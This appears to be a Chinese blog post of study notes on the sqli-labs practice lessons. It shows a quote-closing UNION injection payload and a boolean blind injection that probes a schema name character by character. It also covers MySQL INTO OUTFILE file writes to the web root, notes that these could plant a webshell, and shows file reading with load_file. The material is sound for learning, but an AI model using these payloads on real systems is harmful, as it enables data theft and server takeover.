本文已参与「新人创作礼」活动,一起开启掘金创作之路。 Less THREE
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1
去掉头尾引号可知
出现语法错误处位于 '1'') LIMIT 0,1'
此时可以看出1后的一个' 是我自己加上去的,那么查询语句应该是 where id =.. 'xx')
(xx)为我们输入的内容
然后我们的payload 在1后面加 ')直接构成闭合再注释掉后面的 ')
?id=1') union select ..--+
基础知识扩充
left()函数
left(a,b)从左侧截取a的前b位,正确则返回1,错误返回0
mysql> select left(database(),3)='sec';
+--------------------------+
| left(database(),3)='sec' |
+--------------------------+
| 1 |
+--------------------------+
1 row in set (0.00 sec)
mysql> select left(database(),3)
-> ;
+--------------------+
| left(database(),3) |
+--------------------+
| sec |
+--------------------+
1 row in set (0.00 sec)
regepx函数
eg: select user() regexp 'r' user()的结果是root,regexp为匹配root 的正则表达式;
从左往右匹配
mysql> select user() regexp 'root';
+----------------------+
| user() regexp 'root' |
+----------------------+
| 1 |
+----------------------+
1 row in set (0.00 sec)
mysql> select user() regexp 'r';
+-------------------+
| user() regexp 'r' |
+-------------------+
| 1 |
+-------------------+
1 row in set (0.00 sec)
mysql> select user() regexp 'roo';
+---------------------+
| user() regexp 'roo' |
+---------------------+
| 1 |
+---------------------+
1 row in set (0.00 sec)
mysql> select user() regexp 'rot';
+---------------------+
| user() regexp 'rot' |
+---------------------+
| 0 |
+---------------------+
1 row in set (0.00 sec)
mysql> select user() regexp 'r*';
+--------------------+
| user() regexp 'r*' |
+--------------------+
| 1 |
+--------------------+
1 row in set (0.00 sec)
substr()
substr(string,a,b)
在string中的第a位开始,截取b位
mysql> select substr(database(),1,1);
+------------------------+
| substr(database(),1,1) |
+------------------------+
| s |
+------------------------+
1 row in set (0.00 sec)
mysql> select substr(database(),2,1);
+------------------------+
| substr(database(),2,1) |
+------------------------+
| e |
+------------------------+
1 row in set (0.00 sec)
mysql> select substr(database(),2,3);
+------------------------+
| substr(database(),2,3) |
+------------------------+
| ecu |
+------------------------+
1 row in set (0.00 sec)
ascii()
mysql> select ascii('a');
+------------+
| ascii('a') |
+------------+
| 97 |
+------------+
1 row in set (0.01 sec)
Less FIVE
bool
通过test可知
当语句正确时会出现you are in 字样
/?id='1' and ascii(substr((select schema_name from information_schema.schemata limit 1,1)1,1)) >10--+
通过判断库名首字母的ascii值,逐渐缩小范围
eg : >10 ---> >90 ---> <100 ---> >95 ...
一步步试探 最后 ==99也显示出you are in 故正确
一般只能写脚本或工具来利用bool型注入,手注过于慢!
知识扩充
在默认路径写入文件
mysql> select 'crow' into outfile 'test1.txt'
-> ;
Query OK, 1 row affected (0.01 sec)
mysql> select 'crow' into outfile 'test1.txt';
ERROR 1086 (HY000): File 'test1.txt' already exists
mysql>
该写入文件的默认路径为:D:\phpStudy\PHPTutorial\MySQL\data\
MySQL\data\目录下
在指定路径写入文件
mysql> select 'crow' into outfile 'D:\phpStudy\PHPTutorial\WWW\sqli-labs-master\Less-7\test1.txt';
ERROR 1 (HY000): Can't create/write to file 'D:phpStudyPHPTutorialWWWsqli-labs-masterLess-7 est1.txt' (Errcode: 22)
mysql> select 'crow' into outfile 'D:\phpStudy\PHPTutorial\WWW\sqli-labs-master\Less-7\test1.txt';
ERROR 1 (HY000): Can't create/write to file 'D:phpStudyPHPTutorialWWWsqli-labs-masterLess-7\test1.txt' (Errcode: 2)
mysql> select 'crow' into outfile 'D:\phpStudy\PHPTutorial\WWW\sqli-labs-master\Less-7\test1.txt';
Query OK, 1 row affected (0.00 sec)
mysql> select 'crow' into outfile 'D:\phpStudy\PHPTutorial\WWW\sqli-labs-master\Less-7\test1.txt';
ERROR 1086 (HY000): File 'D:\phpStudy\PHPTutorial\WWW\sqli-labs-master\Less-7\test1.txt' already exists
mysql>
此处注意 记得加上反斜杠!!不然会转义导致路径的错误
此处可写入一句话木马做webshell
读取文件
mysql> select load_file('D:\phpStudy\PHPTutorial\WWW\sqli-labs-master\Less-7\test1.txt');
+----------------------------------------------------------------------------------+
| load_file('D:\phpStudy\PHPTutorial\WWW\sqli-labs-master\Less-7\test1.txt') |
+----------------------------------------------------------------------------------+
| crow
|
+----------------------------------------------------------------------------------+
1 row in set (0.00 sec)
mysql>
